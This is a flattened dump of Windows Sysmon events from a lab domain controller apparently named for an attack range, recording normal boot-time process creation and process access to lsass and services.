15:51:00.269{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000729Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:59.175{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000728Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:59.175{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000727Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:59.175{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000726Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:59.160{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000725Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:59.160{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000724Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.832{D28789B6-7C62-5FA1-0B00-000000008801}868872C:\Windows\system32\lsass.exe{D28789B6-7C61-5FA1-0100-000000008801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+4e37c|C:\Windows\system32\lsasrv.dll+56c8f|C:\Windows\system32\lsasrv.dll+620fe|C:\Windows\system32\lsass.exe+2086|C:\Windows\system32\lsass.exe+1e11|C:\Windows\system32\lsass.exe+1551|C:\Windows\system32\lsass.exe+4708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000723Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.738{D28789B6-7C62-5FA1-0700-000000008801}716720C:\Windows\system32\wininit.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1000000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wininit.exe+b9e0|C:\Windows\system32\wininit.exe+94ff|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000722Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.738{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000721Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.738{D28789B6-7C62-5FA1-0700-000000008801}716720C:\Windows\system32\wininit.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000720Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.747{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe10.0.14393.2580 (rs1_release_inmarket.181009-1745)Local Security Authority ProcessMicrosoft® Windows® Operating SystemMicrosoft Corporationlsass.exeC:\Windows\system32\lsass.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=5AE8589CDDE46ED132AEF8280BC8894A,SHA256=D957A03C6EA35CBF0C90B0B088DF07E7803A1A3EEB4BA889038F88DB066BBDC4,IMPHASH=0AA67FE637515AC7535797573607EAA2{D28789B6-7C62-5FA1-0700-000000008801}716C:\Windows\System32\wininit.exewininit.exe 10341000x8000000000000000719Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.691{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000718Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.691{D28789B6-7C62-5FA1-0700-000000008801}716720C:\Windows\system32\wininit.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+5977|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000717Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.687{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exe10.0.14393.3383 (rs1_release.191125-1816)Services and Controller appMicrosoft® Windows® Operating SystemMicrosoft Corporationservices.exeC:\Windows\system32\services.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=457FD1B4ED8D29816560345AE5BA9B73,SHA256=D99AA02447946EFB935B11D21DF99AFDDA0955A588D6AAC42746DE73E1253956,IMPHASH=264C7CFAFE91682E421A605C58E86E40{D28789B6-7C62-5FA1-0700-000000008801}716C:\Windows\System32\wininit.exewininit.exe 10341000x8000000000000000716Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.504{D28789B6-7C62-5FA1-0600-000000008801}708712C:\Windows\System32\smss.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000715Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.507{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e71SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{D28789B6-7C62-5FA1-0600-000000008801}708C:\Windows\System32\smss.exe- 10341000x8000000000000000714Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.504{D28789B6-7C61-5FA1-0200-000000008801}448632C:\Windows\System32\smss.exe{D28789B6-7C62-5FA1-0800-000000008801}724C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000713Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.441{D28789B6-7C62-5FA1-0400-000000008801}636640C:\Windows\System32\smss.exe{D28789B6-7C62-5FA1-0700-000000008801}716C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000712Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.449{D28789B6-7C62-5FA1-0700-000000008801}716C:\Windows\System32\wininit.exe10.0.14393.2273 (rs1_release_1.180427-1811)Windows Start-Up ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWinInit.exewininit.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=5A998F811D7805B79B8E769027F62FD2,SHA256=8694C5732D26921EEA29589A9FA4182139EF3D9EA6B6D0ACCA8994B4AA5DEFE5,IMPHASH=C8D526C4E61942E1B11AE4B7EE2DDE5D{D28789B6-7C62-5FA1-0400-000000008801}636C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000d4 0000007c 10341000x8000000000000000711Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.441{D28789B6-7C62-5FA1-0600-000000008801}708712C:\Windows\System32\smss.exe{D28789B6-7C62-5FA1-0800-000000008801}724C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000710Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.452{D28789B6-7C62-5FA1-0800-000000008801}724C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e71SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{D28789B6-7C62-5FA1-0600-000000008801}708C:\Windows\System32\smss.exe- 10341000x8000000000000000709Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.441{D28789B6-7C61-5FA1-0200-000000008801}448632C:\Windows\System32\smss.exe{D28789B6-7C62-5FA1-0600-000000008801}708C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000708Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.441{D28789B6-7C61-5FA1-0200-000000008801}448632C:\Windows\System32\smss.exe{D28789B6-7C62-5FA1-0600-000000008801}708C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000707Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.447{D28789B6-7C62-5FA1-0600-000000008801}708C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000f0 0000007c C:\Windows\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e71SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{D28789B6-7C61-5FA1-0200-000000008801}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x8000000000000000706Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.441{D28789B6-7C61-5FA1-0200-000000008801}448632C:\Windows\System32\smss.exe{D28789B6-7C62-5FA1-0500-000000008801}644C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000705Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.300{D28789B6-7C62-5FA1-0400-000000008801}636640C:\Windows\System32\smss.exe{D28789B6-7C62-5FA1-0500-000000008801}644C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000704Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.304{D28789B6-7C62-5FA1-0500-000000008801}644C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{D28789B6-7C62-5FA1-0400-000000008801}636C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000d4 0000007c 10341000x8000000000000000703Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.191{D28789B6-7C61-5FA1-0200-000000008801}448632C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}636C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000702Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.191{D28789B6-7C61-5FA1-0200-000000008801}448632C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}636C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000701Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.193{D28789B6-7C62-5FA1-0400-000000008801}636C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000d4 0000007c C:\Windows\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{D28789B6-7C61-5FA1-0200-000000008801}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x8000000000000000700Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:57.597{D28789B6-7C61-5FA1-0200-000000008801}448452C:\Windows\System32\smss.exe{D28789B6-7C61-5FA1-0300-000000008801}588C:\Windows\system32\autochk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+4f84|\SystemRoot\System32\smss.exe+20b6|\SystemRoot\System32\smss.exe+65b2|\SystemRoot\System32\smss.exe+a3bb|\SystemRoot\System32\smss.exe+1652|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000699Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:57.590{D28789B6-7C61-5FA1-0300-000000008801}588C:\Windows\System32\autochk.exe10.0.14393.3986 (rs1_release.201002-1707)Auto Check UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationAutoChk.Exe\??\C:\Windows\system32\autochk.exe /q /v *C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=A4B90BB5B90C9290CCC38C569D6A72FC,SHA256=E3B7D70BAC1761AEA740CC370486DD3484F570B8EFF75E08DD8AF8175AEE394C,IMPHASH=5F30E54B15CF4B4A5C756AEF16C9668F{D28789B6-7C61-5FA1-0200-000000008801}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 13241300x8000000000000000698Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2020-11-03 15:50:57.566{D28789B6-7C61-5FA1-0100-000000008801}4SystemHKLM\System\CurrentControlSet\Enum\XENVIF\VEN_XS0001&DEV_NET&REV_0000000B\0\FriendlyNameAWS PV Network Device #0 434400x8000000000000000697Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local2020-11-03 15:51:15.800Started12.014.40 10341000x80000000000000001800Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.973{D28789B6-7C64-5FA1-1000-000000008801}11442392C:\Windows\system32\svchost.exe{D28789B6-7C74-5FA1-4800-000000008801}2436C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wmiprvsd.dll+fa1f|C:\Windows\system32\wbem\wmiprvsd.dll+1351d|C:\Windows\system32\wbem\wmiprvsd.dll+127f4|C:\Windows\system32\wbem\wbemcore.dll+ced2|C:\Windows\system32\wbem\wbemcore.dll+d531|C:\Windows\system32\wbem\wbemcore.dll+104fe|C:\Windows\system32\wbem\wbemcore.dll+25435|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c 10341000x80000000000000001799Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 